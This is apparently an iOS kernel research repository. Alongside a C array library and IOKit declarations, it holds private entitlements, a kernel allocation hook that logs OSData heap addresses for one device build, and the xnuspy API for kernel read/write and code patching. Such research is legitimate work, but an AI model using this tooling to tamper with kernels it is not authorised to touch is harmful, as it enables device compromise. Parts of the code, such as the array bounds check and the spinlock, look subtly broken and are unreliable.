| if(!a) 73 | return ARRAY_NULL; 74 | 75 | qsort(a->items, a->len, sizeof(void *), compar); 76 | 77 | return ARRAY_OK; 78 | } 79 | 80 | static int _array_remove(struct array *a, int idx){ 81 | if(idx < 0 || idx >= a->len) 82 | return ARRAY_OOB; 83 | 84 | if(idx == a->len - 1){ 85 | a->len--; 86 | return ARRAY_OK; 87 | } 88 | 89 | void **start = a->items + idx; 90 | size_t bytes = ((a->items + a->len) - (start + 1)) * sizeof(void *); 91 | 92 | memmove(start, start + 1, bytes); 93 | 94 | a->len--; 95 | 96 | return ARRAY_OK; 97 | } 98 | 99 | int array_remove(struct array *a, int idx){ 100 | if(!a) 101 | return ARRAY_NULL; 102 | 103 | if(array_empty(a)) 104 | return ARRAY_OK; 105 | 106 | return _array_remove(a, idx); 107 | } 108 | 109 | int array_remove_elem(struct array *a, void *elem){ 110 | if(!a) 111 | return ARRAY_NULL; 112 | 113 | if(array_empty(a)) 114 | return ARRAY_OK; 115 | 116 | int elemidx = 0; 117 | 118 | while(a->items[elemidx] != elem && elemidx < a->len) 119 | elemidx++; 120 | 121 | return _array_remove(a, elemidx); 122 | } 123 | 124 | int array_safe_get(struct array *a, int idx, void **itemout){ 125 | if(!a) 126 | return ARRAY_NULL; 127 | 128 | if(idx < 0 || idx >= a->len) 129 | return ARRAY_OOB; 130 | 131 | *itemout = a->items[idx]; 132 | 133 | return ARRAY_OK; 134 | } 135 | 136 | int array_shrink_to_fit(struct array *a){ 137 | if(!a) 138 | return ARRAY_NULL; 139 | 140 | void **items_rea = realloc(a->items, a->len * sizeof(void *)); 141 | 142 | a->items = items_rea; 143 | a->capacity = a->len; 144 | 145 | return ARRAY_OK; 146 | } 147 | 148 | struct array *array_new(void){ 149 | struct array *a = malloc(sizeof(struct array)); 150 | 151 | a->items = NULL; 152 | a->len = 0; 153 | a->capacity = STARTING_CAPACITY; 154 | 155 | return a; 156 | } 157 | -------------------------------------------------------------------------------- /array.h: -------------------------------------------------------------------------------- 1 | #ifndef _ARRAY_H_ 2 | #define _ARRAY_H_ 3 | 4 | struct array { 5 | /* The items that make up the array */ 6 | void **items; 7 | 8 | /* How many items the array currently holds */ 9 | unsigned long len; 10 | 11 | /* The amount of memory allocated for this array. 12 | * Doubles every time a->len >= a->capacity - 1. */ 13 | unsigned long capacity; 14 | }; 15 | 16 | enum { 17 | ARRAY_OK = 0, ARRAY_NULL, ARRAY_OOB, ARRAY_KEY_NOT_FOUND 18 | }; 19 | 20 | int array_bsearch(struct array *, const void *, 21 | int (*)(const void *, const void *), void **); 22 | int array_clear(struct array *); 23 | int array_destroy(struct array **); 24 | int array_empty(struct array *); 25 | int array_insert(struct array *, void *); 26 | int array_qsort(struct array *, int (*)(const void *, const void *)); 27 | int array_remove(struct array *, int); 28 | int array_remove_elem(struct array *, void *); 29 | int array_safe_get(struct array *, int, void **); 30 | int array_shrink_to_fit(struct array *); 31 | 32 | struct array *array_new(void); 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /ent.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | com.apple.private.security.container-required 6 | 7 | platform-application 8 | 9 | com.apple.security.iokit-user-client-class 10 | 11 | AGXDeviceUserClient 12 | IOMobileFramebufferUserClient 13 | IOSurfaceRootUserClient 14 | 15 | com.apple.private.allow-explicit-graphics-priority 16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /iokit.h: -------------------------------------------------------------------------------- 1 | #ifndef IOKIT_HEADER 2 | #define IOKIT_HEADER 3 | 4 | #include 5 | #include 6 | #include 7 | 8 | typedef mach_port_t io_object_t; 9 | typedef io_object_t io_connect_t; 10 | typedef io_object_t io_enumerator_t; 11 | typedef io_object_t io_iterator_t; 12 | typedef io_object_t io_registry_entry_t; 13 | typedef io_object_t io_service_t; 14 | typedef io_object_t io_registry_entry_t; 15 | typedef char io_name_t[128]; 16 | typedef char io_string_t[512]; 17 | 18 | #define IO_OBJECT_NULL ((io_object_t) 0) 19 | 20 | typedef uint32_t IOOptionBits; 21 | 22 | /* IOKit/IOKitLib.h */ 23 | extern CFMutableDictionaryRef IORegistryEntryIDMatching(uint32_t service_id); 24 | extern const mach_port_t kIOMasterPortDefault; 25 | 26 | extern CFMutableDictionaryRef IOServiceMatching(const char *name); 27 | 28 | extern io_service_t IOServiceGetMatchingService(mach_port_t masterPort, 29 | CFDictionaryRef matching); 30 | 31 | extern kern_return_t IOServiceGetMatchingServices(mach_port_t, CFMutableDictionaryRef, 32 | io_iterator_t); 33 | 34 | extern kern_return_t IORegistryEntryGetName(io_registry_entry_t entry, io_name_t name); 35 | 36 | extern io_object_t IOIteratorNext(io_iterator_t iterator); 37 | 38 | extern kern_return_t IOConnectSetNotificationPort(io_connect_t connect, 39 | uint32_t type, mach_port_t port, uintptr_t reference); 40 | 41 | extern io_registry_entry_t IORegistryEntryFromPath(mach_port_t masterPort, 42 | const io_string_t path); 43 | 44 | extern int IOIteratorIsValid(io_iterator_t); 45 | 46 | extern kern_return_t IOObjectGetClass(io_object_t object, io_name_t className); 47 | 48 | extern kern_return_t IOServiceOpen(io_service_t service, task_port_t owningTask, 49 | uint32_t type, io_connect_t *connect); 50 | 51 | extern kern_return_t IOConnectMapMemory64(io_connect_t connect, uint32_t memoryType, 52 | mach_port_t intoTask, mach_vm_address_t *atAddress, mach_vm_size_t *ofSize, 53 | uint32_t options); 54 | 55 | extern kern_return_t IOConnectUnmapMemory64(io_connect_t connect, uint32_t memoryType, 56 | task_port_t fromTask, mach_vm_address_t atAddress); 57 | 58 | extern io_registry_entry_t IORegistryGetRootEntry(mach_port_t masterPort); 59 | 60 | extern CFTypeRef IORegistryEntrySearchCFProperty(io_registry_entry_t entry, 61 | const io_name_t plane, CFStringRef key, CFAllocatorRef allocator, IOOptionBits options); 62 | 63 | extern CFTypeRef IORegistryEntryCreateCFProperty(io_registry_entry_t entry, 64 | CFStringRef key, CFAllocatorRef allocator, IOOptionBits options); 65 | 66 | extern kern_return_t IOConnectCallScalarMethod(mach_port_t connection, 67 | uint32_t selector, const uint64_t *input, uint32_t inputCnt, 68 | uint64_t *output, uint32_t *outputCnt); 69 | 70 | extern kern_return_t IOConnectCallStructMethod(mach_port_t connection, 71 | uint32_t selector, const void *inputStruct, size_t inputStructCnt, 72 | void *outputStruct, size_t *outputStructCnt); 73 | 74 | extern kern_return_t IOConnectCallAsyncMethod(mach_port_t connection, 75 | uint32_t selector, mach_port_t wake_port, uint64_t *reference, 76 | uint32_t referenceCnt, const uint64_t *input, uint32_t inputCnt, 77 | const void *inputStruct, size_t inputStructCnt, uint64_t *output, 78 | uint32_t *outputCnt, void *outputStruct, size_t *outputStructCnt); 79 | 80 | extern kern_return_t IOConnectCallMethod(mach_port_t connection, uint32_t selector, 81 | const uint64_t *input, uint32_t inputCnt, const void *inputStruct, 82 | size_t inputStructCnt, uint64_t *output, uint32_t *outputCnt, 83 | void *outputStruct, size_t *outputStructCnt); 84 | 85 | 86 | 87 | extern kern_return_t IOConnectTrap0(io_connect_t connect, uint32_t index); 88 | extern kern_return_t IOConnectTrap1(io_connect_t connect, uint32_t index, uintptr_t p1); 89 | extern kern_return_t IOConnectTrap2(io_connect_t connect, uint32_t index, uintptr_t p1, 90 | uintptr_t p2); 91 | extern kern_return_t IOConnectTrap3(io_connect_t connect, uint32_t index, uintptr_t p1, 92 | uintptr_t p2, uintptr_t p3); 93 | extern kern_return_t IOConnectTrap4(io_connect_t connect, uint32_t index, uintptr_t p1, 94 | uintptr_t p2, uintptr_t p3, uintptr_t p4); 95 | extern kern_return_t IOConnectTrap5(io_connect_t connect, uint32_t index, uintptr_t p1, 96 | uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5); 97 | extern kern_return_t IOConnectTrap6(io_connect_t connect, uint32_t index, uintptr_t p1, 98 | uintptr_t p2, uintptr_t p3, uintptr_t p4, uintptr_t p5, uintptr_t p6); 99 | 100 | extern kern_return_t IOConnectAddClient(io_connect_t connect, io_connect_t client); 101 | 102 | extern kern_return_t IOServiceClose(io_connect_t connect); 103 | 104 | enum { 105 | kOSSerializeDictionary = 0x01000000U, 106 | kOSSerializeArray = 0x02000000U, 107 | kOSSerializeSet = 0x03000000U, 108 | kOSSerializeNumber = 0x04000000U, 109 | kOSSerializeSymbol = 0x08000000U, 110 | kOSSerializeString = 0x09000000U, 111 | kOSSerializeData = 0x0a000000U, 112 | kOSSerializeBoolean = 0x0b000000U, 113 | kOSSerializeObject = 0x0c000000U, 114 | kOSSerializeTypeMask = 0x7F000000U, 115 | kOSSerializeDataMask = 0x00FFFFFFU, 116 | kOSSerializeEndCollection = 0x80000000U, 117 | kOSSerializeBinarySignature = 0x000000d3U, 118 | }; 119 | 120 | struct IOKitDiagnosticsParameters { 121 | size_t size; 122 | uint64_t value; 123 | uint32_t options; 124 | uint32_t tag; 125 | uint32_t zsize; 126 | uint32_t reserved[8]; 127 | }; 128 | 129 | typedef struct IOKitDiagnosticsParameters IOKitDiagnosticsParameters; 130 | 131 | enum{ 132 | kIOTrackingCallSiteBTs = 16, 133 | }; 134 | 135 | struct IOTrackingCallSiteInfo { 136 | uint32_t count; 137 | pid_t addressPID; 138 | mach_vm_address_t address; 139 | mach_vm_size_t size[2]; 140 | pid_t btPID; 141 | mach_vm_address_t bt[2][kIOTrackingCallSiteBTs]; 142 | }; 143 | 144 | enum{ 145 | kIOTrackingExcludeNames = 0x00000001, 146 | }; 147 | 148 | enum{ 149 | kIOTrackingGetTracking = 0x00000001, 150 | kIOTrackingGetMappings = 0x00000002, 151 | kIOTrackingResetTracking = 0x00000003, 152 | kIOTrackingStartCapture = 0x00000004, 153 | kIOTrackingStopCapture = 0x00000005, 154 | kIOTrackingSetMinCaptureSize = 0x00000006, 155 | kIOTrackingLeaks = 0x00000007, 156 | kIOTrackingInvalid = 0xFFFFFFFE, 157 | }; 158 | enum { 159 | kIODefaultMemoryType = 0 160 | }; 161 | 162 | enum { 163 | kIODefaultCache = 0, 164 | kIOInhibitCache = 1, 165 | kIOWriteThruCache = 2, 166 | kIOCopybackCache = 3, 167 | kIOWriteCombineCache = 4, 168 | kIOCopybackInnerCache = 5, 169 | kIOPostedWrite = 6, 170 | kIORealTimeCache = 7, 171 | kIOPostedReordered = 8, 172 | kIOPostedCombinedReordered = 9, 173 | }; 174 | 175 | enum { 176 | kIOMapAnywhere = 0x00000001, 177 | 178 | kIOMapCacheMask = 0x00000f00, 179 | kIOMapCacheShift = 8, 180 | kIOMapDefaultCache = kIODefaultCache << kIOMapCacheShift, 181 | kIOMapInhibitCache = kIOInhibitCache << kIOMapCacheShift, 182 | kIOMapWriteThruCache = kIOWriteThruCache << kIOMapCacheShift, 183 | kIOMapCopybackCache = kIOCopybackCache << kIOMapCacheShift, 184 | kIOMapWriteCombineCache = kIOWriteCombineCache << kIOMapCacheShift, 185 | kIOMapCopybackInnerCache = kIOCopybackInnerCache << kIOMapCacheShift, 186 | kIOMapPostedWrite = kIOPostedWrite << kIOMapCacheShift, 187 | kIOMapRealTimeCache = kIORealTimeCache << kIOMapCacheShift, 188 | kIOMapPostedReordered = kIOPostedReordered << kIOMapCacheShift, 189 | kIOMapPostedCombinedReordered = kIOPostedCombinedReordered << kIOMapCacheShift, 190 | 191 | kIOMapUserOptionsMask = 0x00000fff, 192 | 193 | kIOMapReadOnly = 0x00001000, 194 | 195 | kIOMapStatic = 0x01000000, 196 | kIOMapReference = 0x02000000, 197 | kIOMapUnique = 0x04000000, 198 | kIOMapPrefault = 0x10000000, 199 | kIOMapOverwrite = 0x20000000 200 | }; 201 | #endif 202 | -------------------------------------------------------------------------------- /kernel_hooks.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void *g_osdata_kaddrs[8000]; 6 | uint64_t g_osdata_kaddrs_idx = 0; 7 | bool g_record_osdata_kaddrs = false; 8 | 9 | uint64_t kernel_slide = 0; 10 | 11 | kern_return_t (*kernel_memory_allocate)(void *, uint64_t *, uint64_t, 12 | uint64_t, uint64_t, uint32_t); 13 | 14 | kern_return_t _kernel_memory_allocate(void *map, uint64_t *addrp, 15 | uint64_t size, uint64_t mask, uint64_t flags, uint32_t tag){ 16 | uint64_t caller = (uint64_t)__builtin_return_address(0) - kernel_slide; 17 | 18 | kern_return_t kret = kernel_memory_allocate(map, addrp, size, mask, 19 | flags, tag); 20 | 21 | /* if(caller == 0xfffffff007fc0f24){ */ 22 | /* XXX iphone se 14.7 below */ 23 | if(caller == 0xfffffff007658300){ 24 | uint64_t osdata_mem = *addrp; 25 | 26 | if(size == 0x10000 && g_record_osdata_kaddrs){ 27 | g_osdata_kaddrs[g_osdata_kaddrs_idx] = (void *)osdata_mem; 28 | g_osdata_kaddrs_idx++; 29 | } 30 | } 31 | 32 | return kret; 33 | } 34 | -------------------------------------------------------------------------------- /kernel_hooks.h: -------------------------------------------------------------------------------- 1 | #ifndef KERNEL_HOOKS 2 | #define KERNEL_HOOKS 3 | 4 | #include 5 | #include 6 | 7 | kern_return_t (*kernel_memory_allocate)(void *, uint64_t *, uint64_t, uint64_t, uint64_t, uint32_t); 8 | kern_return_t _kernel_memory_allocate(void *map, uint64_t *addrp, 9 | uint64_t size, uint64_t mask, uint64_t flags, uint32_t tag); 10 | 11 | #endif 12 | -------------------------------------------------------------------------------- /xnuspy_ctl.h: -------------------------------------------------------------------------------- 1 | #ifndef XNUSPY_CTL 2 | #define XNUSPY_CTL 3 | 4 | #include 5 | 6 | /* Flavors for xnuspy_ctl */ 7 | enum { 8 | XNUSPY_CHECK_IF_PATCHED = 0, 9 | XNUSPY_INSTALL_HOOK, 10 | XNUSPY_REGISTER_DEATH_CALLBACK, 11 | XNUSPY_CALL_HOOKME, 12 | XNUSPY_CACHE_READ, 13 | XNUSPY_KREAD, 14 | XNUSPY_KWRITE, 15 | XNUSPY_GET_CURRENT_THREAD, 16 | #ifdef XNUSPY_PRIVATE 17 | XNUSPY_MAX_FLAVOR = XNUSPY_GET_CURRENT_THREAD, 18 | #endif 19 | }; 20 | 21 | /* Values for XNUSPY_CACHE_READ - keep this alphabetical so it's 22 | * easier to find things */ 23 | 24 | #ifdef XNUSPY_PRIVATE 25 | enum xnuspy_cache_id { 26 | #else 27 | enum { 28 | #endif 29 | /* struct proclist allproc @ bsd/sys/proc_internal.h */ 30 | ALLPROC = 0, 31 | BCOPY_PHYS, 32 | BZERO, 33 | COPYIN, 34 | COPYINSTR, 35 | COPYOUT, 36 | 37 | /* Idential to XNU's implementation */ 38 | CURRENT_MAP, 39 | 40 | CURRENT_PROC, 41 | 42 | /* Only valid for iOS 14.5 - iOS 14.8, inclusive. EINVAL will be 43 | * returned otherwise. */ 44 | IO_LOCK, 45 | 46 | /* Only valid for iOS 15.x. EINVAL will be returned otherwise. */ 47 | IPC_OBJECT_LOCK, 48 | 49 | IOLOG, 50 | IOSLEEP, 51 | 52 | /* Only valid for < iOS 14.5. EINVAL will be returned otherwise. */ 53 | IPC_PORT_RELEASE_SEND, 54 | 55 | /* Only valid for >= iOS 14.5. EINVAL will be returned otherwise. */ 56 | IPC_PORT_RELEASE_SEND_AND_UNLOCK, 57 | 58 | /* Selects the correct way to release a send right based on the 59 | * kernel version. Parameters are the same as XNU's 60 | * ipc_port_release_send. */ 61 | IPC_PORT_RELEASE_SEND_WRAPPER, 62 | 63 | /* Only valid for iOS 13.x. EINVAL will be returned otherwise. */ 64 | KALLOC_CANBLOCK, 65 | 66 | /* Only valid for iOS 14.x and iOS 15.x. EINVAL will be returned 67 | * otherwise. */ 68 | KALLOC_EXTERNAL, 69 | 70 | /* vm_map_t kernel_map @ osfmk/vm/vm_kern.h */ 71 | KERNEL_MAP, 72 | 73 | KERNEL_THREAD_START, 74 | 75 | /* Only valid for iOS 13.x. EINVAL will be returned otherwise. */ 76 | KFREE_ADDR, 77 | 78 | /* Only valid for iOS 14.x and iOS 15.x. EINVAL will be returned 79 | * otherwise. */ 80 | KFREE_EXT, 81 | 82 | KPRINTF, 83 | LCK_GRP_ALLOC_INIT, 84 | LCK_GRP_FREE, 85 | LCK_MTX_LOCK, 86 | LCK_MTX_UNLOCK, 87 | LCK_RW_ALLOC_INIT, 88 | LCK_RW_DONE, 89 | LCK_RW_FREE, 90 | LCK_RW_LOCK_EXCLUSIVE, 91 | LCK_RW_LOCK_SHARED, 92 | LCK_RW_LOCK_SHARED_TO_EXCLUSIVE, 93 | MACH_MAKE_MEMORY_ENTRY_64, 94 | MACH_TO_BSD_ERRNO, 95 | MACH_VM_MAP_EXTERNAL, 96 | MEMCHR, 97 | MEMCMP, 98 | MEMMEM, 99 | MEMMOVE, 100 | MEMRCHR, 101 | MEMSET, 102 | PANIC, 103 | PHYSTOKV, 104 | 105 | /* Selects the correct way to take proc_list_mlock based 106 | * on the kernel version. 107 | * 108 | * void proc_list_lock(void); 109 | * 110 | */ 111 | PROC_LIST_LOCK, 112 | 113 | /* lck_mtx_t *proc_list_mlock @ bsd/sys/proc_internal.h */ 114 | PROC_LIST_MLOCK, 115 | 116 | /* Selects the correct way to release proc_list_mlock based 117 | * on the kernel version. 118 | * 119 | * void proc_list_unlock(void); 120 | * 121 | */ 122 | PROC_LIST_UNLOCK, 123 | 124 | PROC_NAME, 125 | PROC_PID, 126 | 127 | /* Only valid for 15.x. EINVAL will be returned otherwise. 128 | * Until 15 sources come out, here's what I think the function 129 | * signature is: 130 | * 131 | * proc_t proc_ref(proc_t proc, bool holding_proc_list_mlock); 132 | * 133 | * You can find a call to it in proc_exit. It looks like it is good 134 | * practice to make sure the returned proc pointer was the same one 135 | * as you passed in. Not sure what the return value being different 136 | * than the first parameter indicates... */ 137 | PROC_REF, 138 | 139 | /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise. 140 | * This function assumes the caller holds proc_list_mlock. */ 141 | PROC_REF_LOCKED, 142 | 143 | /* Selects the correct way to take a reference on a proc structure 144 | * based on the kernel version. 145 | * 146 | * void *proc_ref_wrapper(void *proc, bool holding_proc_list_mlock); 147 | * 148 | * If you are on iOS 13.x or iOS 14.x and you pass false for the 149 | * second parameter, this function takes proc_list_mlock before 150 | * calling proc_ref_locked and releases it after that returns. If 151 | * you are on iOS 15.x, this tail calls proc_ref. Return value 152 | * is either the return value of proc_ref or proc_ref_locked. */ 153 | PROC_REF_WRAPPER, 154 | 155 | /* Only valid for 15.x. EINVAL will be returned otherwise. 156 | * This function assumes the caller DOES NOT hold proc_list_mlock, 157 | * though I'm not sure if it's safe to hold that mutex and call this 158 | * function. 159 | * Until 15 sources come out, here's the function signature: 160 | * 161 | * int proc_rele(proc_t proc); 162 | * 163 | * Seems to always return 0. */ 164 | PROC_RELE, 165 | 166 | /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise. 167 | * This function assumes the caller holds proc_list_mlock. */ 168 | PROC_RELE_LOCKED, 169 | 170 | /* Selects the correct way to release a reference on a proc structure 171 | * based on the kernel version. 172 | * 173 | * int proc_rele_wrapper(void *proc, bool holding_proc_list_mlock); 174 | * 175 | * If you are on iOS 13.x or iOS 14.x and you pass false for the 176 | * second parameter, this function takes proc_list_mlock before 177 | * calling proc_rele_locked and releases it after that returns. If 178 | * you are on iOS 15.x, this tail calls proc_rele and the second 179 | * parameter is ignored. Return value is either the return value 180 | * of proc_ref (for iOS 15.x) or zero (for iOS 13.x and iOS 14.x) */ 181 | PROC_RELE_WRAPPER, 182 | 183 | PROC_UNIQUEID, 184 | SNPRINTF, 185 | STRCHR, 186 | STRRCHR, 187 | STRCMP, 188 | STRLEN, 189 | STRNCMP, 190 | STRSTR, 191 | STRNSTR, 192 | THREAD_DEALLOCATE, 193 | THREAD_TERMINATE, 194 | VM_ALLOCATE_EXTERNAL, 195 | VM_DEALLOCATE, 196 | VM_MAP_DEALLOCATE, 197 | 198 | /* Identical to XNU's implementation */ 199 | VM_MAP_REFERENCE, 200 | 201 | /* Only valid for 13.x and 14.x. EINVAL will be returned otherwise. */ 202 | VM_MAP_UNWIRE, 203 | 204 | /* Only valid for 15.x. EINVAL will be returned otherwise. */ 205 | VM_MAP_UNWIRE_NESTED, 206 | 207 | /* Selects the correct way to unwire a vm_map based on the 208 | * kernel version. Parameters are the same as XNU's vm_map_unwire. */ 209 | VM_MAP_UNWIRE_WRAPPER, 210 | 211 | VM_MAP_WIRE_EXTERNAL, 212 | 213 | /* -------------------------------------------- 214 | * Everything above (with the exception of the small wrapper functions) 215 | * is from XNU, everything below are things from xnuspy you may 216 | * find useful 217 | * --------------------------------------------- 218 | */ 219 | 220 | /* uint64_t *el0_ptep(void *uaddr) 221 | * 222 | * Given a user virtual address, this function returns a pointer to its 223 | * page table entry. 224 | * 225 | * Parameters: 226 | * uaddr: user virtual address. 227 | * 228 | * Returns: 229 | * Kernel virtual address of page table entry for uaddr. 230 | */ 231 | EL0_PTEP, 232 | 233 | /* uint64_t *el1_ptep(void *kaddr) 234 | * 235 | * Given a kernel virtual address, this function returns a pointer to its 236 | * page table entry. 237 | * 238 | * Parameters: 239 | * kaddr: kernel virtual address. 240 | * 241 | * Returns: 242 | * Kernel virtual address of page table entry for kaddr. 243 | */ 244 | EL1_PTEP, 245 | 246 | /* void hookme(void *arg) 247 | * 248 | * This function is a stub for you to hook to easily gain kernel code 249 | * execution without having to hook an actual kernel function. You can 250 | * get xnuspy to call it by invoking xnuspy_ctl with the 251 | * XNUSPY_CALL_HOOKME flavor. 252 | */ 253 | HOOKME, 254 | 255 | /* uint64_t iOS_version 256 | * 257 | * This variable contains the major from the "Darwin Kernel Version" 258 | * string. On iOS 13.x, this is 19, on iOS 14.x, this is 20, and 259 | * on iOS 15.x, this is 21. */ 260 | IOS_VERSION, 261 | 262 | /* uint64_t kernel_slide 263 | * 264 | * KASLR slide */ 265 | KERNEL_SLIDE, 266 | 267 | /* uint64_t kern_version_minor 268 | * 269 | * This variable contains the minor from the "Darwin Kernel Version" 270 | * string. */ 271 | KERN_VERSION_MINOR, 272 | 273 | /* int kprotect(void *kaddr, uint64_t size, vm_prot_t prot) 274 | * 275 | * Change protections of kernel memory at the page table level. 276 | * You are allowed to make writable, executable memory. 277 | * 278 | * Parameters: 279 | * kaddr: kernel virtual address of target. 280 | * size: the number of bytes in the target region. 281 | * prot: protections to apply. Only VM_PROT_READ, VM_PROT_WRITE, and 282 | * VM_PROT_EXECUTE are respected. 283 | * 284 | * Returns: 285 | * Zero if successful, non-zero otherwise. 286 | */ 287 | KPROTECT, 288 | 289 | /* uint64_t kvtophys(uint64_t kaddr) 290 | * 291 | * Convert a kernel (EL1) virtual address to a physical address. 292 | * 293 | * Parameters: 294 | * kaddr: kernel virtual address. 295 | * 296 | * Returns: 297 | * Non-zero if address translation was successful, zero otherwise. 298 | */ 299 | KVTOPHYS, 300 | 301 | /* void kwrite_instr(uint64_t addr, uint32_t instr) 302 | * 303 | * Patch a single instruction of executable kernel code. This function 304 | * handles permissions, data cache cleaning, and instruction cache 305 | * invalidation. 306 | * 307 | * Parameters: 308 | * addr: kernel virtual address. 309 | * instr: new instruction for addr. 310 | */ 311 | KWRITE_INSTR, 312 | 313 | /* void kwrite_static(void *dst, void *buf, size_t sz) 314 | * 315 | * Write to static kernel memory, using bcopy_phys. 316 | * 317 | * Parameters: 318 | * dst: kernel virtual address of destination. 319 | * buf: kernel virtual address of data. 320 | * sz: how many bytes 'buf' is. 321 | */ 322 | KWRITE_STATIC, 323 | 324 | /* The next three functions deal with shared memory. KTOU ("kernel to 325 | * user") and UTOK ("user to kernel") specify the "direction". "a to b", 326 | * where and are both vm_map pointers, means pages from will 327 | * be mapped into as shared memory. Pages from must have been 328 | * allocated via vm_allocate for these functions to succeed. KTOU and UTOK 329 | * automatically select the and vm_map pointers for convenience. 330 | * The RAW variant allows you to specify the and vm_map pointers. 331 | * You would use mkshmem_raw when you are unsure of current_task()->map 332 | * or the current CPU's TTBR0 inside your kernel code. 333 | * 334 | * int mkshmem_ktou(uint64_t kaddr, uint64_t sz, vm_prot_t prot, 335 | * struct xnuspy_shmem *shmemp); 336 | * int mkshmem_utok(uint64_t uaddr, uint64_t sz, vm_prot_t prot, 337 | * struct xnuspy_shmem *shmemp); 338 | * int mkshmem_raw(uint64_t addr, uint64_t sz, vm_prot_t prot, 339 | * vm_map_t from, vm_map_t to, struct xnuspy_shmem *shmemp); 340 | * 341 | * Parameters (for all three): 342 | * kaddr/uaddr/addr: virtual address somewhere inside 343 | * sz: page aligned mapping size 344 | * prot: virtual protections to apply to the created 345 | * shared mapping 346 | * shmemp: returned shmem. The structure definition can 347 | * be found at the end of this file. 348 | * 349 | * Parameters specific to mkshmem_raw: 350 | * from: source map, aka 351 | * to: destination map, aka 352 | * 353 | * Returns (for all three): 354 | * Zero on success (and populated shmemp structure), non-zero BSD errno 355 | * on failure. 356 | * 357 | * Other notes: 358 | * These functions use kprotect to apply VM protections, so any 359 | * combination of those are allowed. VM protections are only applied 360 | * to the newly-created mapping, not the source pages that came 361 | * from . 362 | */ 363 | MKSHMEM_KTOU, 364 | MKSHMEM_UTOK, 365 | MKSHMEM_RAW, 366 | 367 | /* offsetof(struct thread, map), vm_map_t */ 368 | OFFSETOF_STRUCT_THREAD_MAP, 369 | 370 | /* offsetof(struct _vm_map, map_refcnt), int (yes, int) */ 371 | OFFSETOF_STRUCT_VM_MAP_REFCNT, 372 | 373 | /* int shmem_destroy(struct xnuspy_shmem *shmemp); 374 | * 375 | * Destory shared memory returned by mkshmem_ktou, mkshmem_utok, or 376 | * mkshmem_raw. 377 | * 378 | * Parameters: 379 | * shmemp: pointer to shmem structure 380 | * 381 | * Returns: 382 | * Zero on success, non-zero BSD errno on failure. 383 | */ 384 | SHMEM_DESTROY, 385 | 386 | /* void tlb_flush(void) 387 | * 388 | * After modifying a page table, call this function to invalidate 389 | * the TLB. 390 | */ 391 | TLB_FLUSH, 392 | 393 | /* The next two functions abstract away the different kalloc/kfree pairs 394 | * for different iOS versions and keeps track of allocation sizes. This 395 | * creates an API like malloc/free. Pointers returned from unified_kalloc 396 | * can only be freed with unified_kfree, and pointers returned by other 397 | * memory allocation functions cannot be freed with unified_kfree. 398 | * 399 | * uint8_t *buf = unified_kalloc(0x200); 400 | * 401 | * if(!buf) 402 | * 403 | * 404 | * buf[0] = '\0'; 405 | * 406 | * unified_kfree(buf); 407 | * 408 | * ------------------------------- 409 | * 410 | * void *unified_kalloc(size_t sz) 411 | * 412 | * Parameters: 413 | * sz: allocation size. 414 | * 415 | * Returns: 416 | * Upon success, a pointer to memory. If we are on 13.x, kalloc_canblock's 417 | * canblock parameter is false. Upon failure, NULL. 418 | * 419 | * ------------------------------- 420 | * 421 | * void unified_kfree(void *ptr) 422 | * 423 | * Parameters: 424 | * ptr: a pointer returned from unified_kalloc. 425 | */ 426 | UNIFIED_KALLOC, 427 | UNIFIED_KFREE, 428 | 429 | /* int uprotect(void *uaddr, uint64_t size, vm_prot_t prot) 430 | * 431 | * Change protections of user memory at the page table level. 432 | * You are allowed to make writable, executable memory. 433 | * 434 | * Parameters: 435 | * uaddr: user virtual address of target. 436 | * size: the number of bytes in the target region. 437 | * prot: protections to apply. Only VM_PROT_READ, VM_PROT_WRITE, and 438 | * VM_PROT_EXECUTE are respected. 439 | * 440 | * Returns: 441 | * Zero if successful, non-zero otherwise. 442 | */ 443 | UPROTECT, 444 | 445 | /* uint64_t uvtophys(uint64_t uaddr) 446 | * 447 | * Convert a user (EL0) virtual address to a physical address. 448 | * 449 | * Parameters: 450 | * uaddr: user virtual address. 451 | * 452 | * Returns: 453 | * Non-zero if address translation was successful, zero otherwise. 454 | */ 455 | UVTOPHYS, 456 | 457 | #ifdef XNUSPY_PRIVATE 458 | MAX_CACHE = UVTOPHYS, 459 | #endif 460 | }; 461 | 462 | #define iOS_13_x (19) 463 | #define iOS_14_x (20) 464 | #define iOS_15_x (21) 465 | 466 | /* Structures for locks that work in both kernelspace and userspace. 467 | * Any locks you declare must be declared globally so they 468 | * are mapped as shared memory when you install your kernel hooks */ 469 | /* kuslck_t: a simple spinlock */ 470 | typedef struct { 471 | uint32_t word; 472 | } kuslck_t; 473 | 474 | #define KUSLCK_UNLOCKED (0) 475 | #define KUSLCK_LOCKED (1) 476 | 477 | /* kuslck_t lck = KUSLCK_INITIALIZER; */ 478 | #define KUSLCK_INITIALIZER { .word = KUSLCK_UNLOCKED } 479 | 480 | #define kuslck_lock(lck) \ 481 | do { \ 482 | while(__atomic_exchange_n(&(lck).word, KUSLCK_LOCKED, \ 483 | __ATOMIC_ACQ_REL) == 0){} \ 484 | } while (0) \ 485 | 486 | #define kuslck_unlock(lck) \ 487 | do { \ 488 | __atomic_store_n(&(lck).word, KUSLCK_UNLOCKED, __ATOMIC_RELEASE); \ 489 | } while (0) \ 490 | 491 | struct xnuspy_shmem { 492 | /* Base of shared memory */ 493 | void *shm_base; 494 | /* Size of shared memory, page multiple */ 495 | uint64_t shm_sz; 496 | #ifdef XNUSPY_PRIVATE 497 | /* Memory entry for the shared memory, ipc_port_t */ 498 | void *shm_entry; 499 | /* The vm_map_t which the source pages belong to */ 500 | void *shm_map_from; 501 | /* The vm_map_t which the source pages were mapped into */ 502 | void *shm_map_to; 503 | #else 504 | void *opaque[3]; 505 | #endif 506 | }; 507 | 508 | #endif 509 | --------------------------------------------------------------------------------